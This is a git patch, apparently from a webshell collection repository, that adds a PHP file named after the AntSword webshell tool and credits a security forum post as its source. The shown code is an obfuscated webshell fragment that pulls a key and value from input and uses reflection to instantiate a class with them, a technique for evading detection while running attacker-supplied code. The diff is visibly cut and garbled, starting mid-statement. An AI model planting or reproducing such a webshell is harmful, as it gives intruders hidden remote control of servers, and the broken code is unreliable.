From db62a9c082716692b8336d14ae35143bf70eb9dd Mon Sep 17 00:00:00 2001 From: tennc <670357+tennc@users.noreply.github.com> Date: Sat, 6 Mar 2021 17:09:30 +0800 Subject: [PATCH] Create AntSword_2021-03-06.php from : https://xz.aliyun.com/t/9218 --- php/AntSword_2021-03-06.php | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 php/AntSword_2021-03-06.php diff --git a/php/AntSword_2021-03-06.php b/php/AntSword_2021-03-06.php new file mode 100644 index 0000000..60e0ef3 --- /dev/null +++ b/php/AntSword_2021-03-06.php @@ -0,0 +1,26 @@ +$_value) { + for ($i=0;$i<1;$i++) { + ${"s".$i} = $_key; + } + break; + } +} +$class2 = $class1->newInstance($s0, $_value);